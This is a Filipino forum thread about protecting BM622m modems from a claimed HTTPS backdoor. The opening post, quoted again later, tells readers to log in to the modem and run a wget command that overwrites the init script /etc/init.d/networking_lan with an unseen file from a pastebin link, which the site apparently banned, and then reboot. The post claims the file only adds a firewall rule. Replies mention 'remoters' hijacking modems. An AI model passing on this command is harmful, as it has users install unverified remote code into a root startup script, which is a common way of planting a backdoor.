IMPORTANT: bm622m 2012 https protection

[hi2u]

I wanted to make a separate thread to remind everyone to protect their modems! So far the methods of protection posted only do things like hide/mask the mac or change passwords. This cannot protect you against the new backdoor I revealed yesterday in this thread: http://www.symbianize.com/showthread.php?t=1162514

Even if you disable httpsd from the ACL menu it's still enabled! This means you can be easily remoted even if you use the basic protection methods I mentioned before. But I have a solution for this, make sure you are connected to the internet, then connect on telnet or ssh and run these two commands:

wget http://*** BANNED LINK - DO NOT POST ***/raw.php?i=T3qSMCab -O /etc/init.d/networking_lan
reboot

When you are done it should look like this:

If you ran these two commands successfully your modem will reboot and the protection will be enabled, nothing else needs to be done!

Running these commands adds one line to this init.d script on your modem, this line:

iptables -A INPUT -p tcp --dport 443 -j REJECT

This rejects incoming connections on port 443, keeping your modem safe from remoters. You still need to make sure everything else (80, 22, 23) is disabled. Good luck!

 

[basteban]

TS pakiayos po ng tuts mo..kung maari po lagayan mo ng SS...tnx

 

[badgee09]

ts paki clear po ung tut.. in what line sa script ilalagay ung itinuro mo. thanx

 

[hi2u]

I will edit the post with a screenshot, just wait

 

[basteban]

medyo magulo parin TS ah.. putty ba ang gagamitin na tools?? pakiclear po..thanks

 

[cokefloat]

telnet po pwede din sa putty

working naman saken

 

[hi2u]

Yes, you need to use putty and telnet or ssh to your modem. If you don't know how to do this you should search for a tutorial.

 

[basteban]

paturo nman po ng step by step procedure? tnx

 

[hi2u]

Just download putty, connect to your modem on ssh or telnet, ip should be 192.168.254.1, send the commands I gave (wget, reboot)

 

[globespy0917]

nagpapakahirap pa kayo. change nyo lng un port ng https

 

[spaknotboy]

I wanted to make a separate thread to remind everyone to protect their modems! So far the methods of protection posted only do things like hide/mask the mac or change passwords. This cannot protect you against the new backdoor I revealed yesterday in this thread: http://www.symbianize.com/showthread.php?t=1162514

Even if you disable httpsd from the ACL menu it's still enabled! This means you can be easily remoted even if you use the basic protection methods I mentioned before. But I have a solution for this, make sure you are connected to the internet, then connect on telnet or ssh and run these two commands:

wget http://*** BANNED LINK - DO NOT POST ***/raw.php?i=T3qSMCab -O /etc/init.d/networking_lan
reboot

When you are done it should look like this:

http://i6.minus.com/jpAdOmaTxpYgR.png

If you ran these two commands successfully your modem will reboot and the protection will be enabled, nothing else needs to be done!

Running these commands adds one line to this init.d script on your modem, this line:

iptables -A INPUT -p tcp --dport 443 -j REJECT

This rejects incoming connections on port 443, keeping your modem safe from remoters. You still need to make sure everything else (80, 22, 23) is disabled. Good luck!

pag na uncheck ung http at https wan mapapasok padin?

 

[hi2u]

Yes everything should be disabled on wan, but disabling https wan from ACL doesn't work because of a bug in the firmware so you need to do like I said in this thread. Even if you unchecked it it's still enabled.

 

[edgexxv]

nagpapakahirap pa kayo. change nyo lng un port ng https

kaya nga eh guhehe xD change port sa https lang ang katapat nyan hindi ung napakadami pang gagawin na ung iba eh baka nalilito na

 

[hi2u]

Changing the port doesn't work. Same thing as trying to disable it. Even after you reboot your modem it's still on and still on port 443. The firmware has a bug. You need to close it another way, what I gave here will do it. If you don't believe me leave your modem on and try to connect to port 443 with a different modem.

 

[othersideme]

thanks for sharing https nga madalas ko daanan pag nagssnipe ako

 

[loloytisoy]

Gumawa ka na lang ng s0ftware 0r script ts para mas madali

 

[jimmynuarin]

thanks po

 

[x3n0nx]

ano pla software version mo ts? tinry ko sakin na totoo bang open ang https kasi 2 ang 22m ko pero di ko siya ma access nor ma scan sa angry ip..

 

[edgexxv]

Changing the port doesn't work. Same thing as trying to disable it. Even after you reboot your modem it's still on and still on port 443. The firmware has a bug. You need to close it another way, what I gave here will do it. If you don't believe me leave your modem on and try to connect to port 443 with a different modem.

are you sure? kahit ilang beses mo pa i-reboot ung 622m mo eh hindi pa din magbabago ang port number sa https na nilagay mo. nagreboot ka lang naman ng modem eh at hindi nagrestore default. the same goes to dv235t. babalik lang yan sa dati kung nag restore default ka. pinapahirapan mo lang ung ibang hindi marunong magprotect ng modems nila eh. gumamet ka lang ng firefox tapos magdownload ka ng web developer add on. pagkalogin sa gui, punta sa acl at pindutin ang shfit+alt+a at makikita mo na dun ung mga ports. you can change everything there wag mo lang gagawing zero kasi masscan pa din ang https or if you want, you can add the ip ranges from 10.1.1.1 to 10.254.254.254 in ip incoming filtering. kahit wala ka ng baguhin or disable ang mga ports, protected pa din yan sa mga remoters.

 

[x3n0nx]

^ bro i tried the ip filtering and enable the wan if surely ba binoblock niya kaso indi i can still access it. mas advantage talaga if u have 2 modems to test if your protection really works..and as i've observe if i open the wan http i can access also the https but when I disable the wan on the http i can't access the https. so it's says na protected na?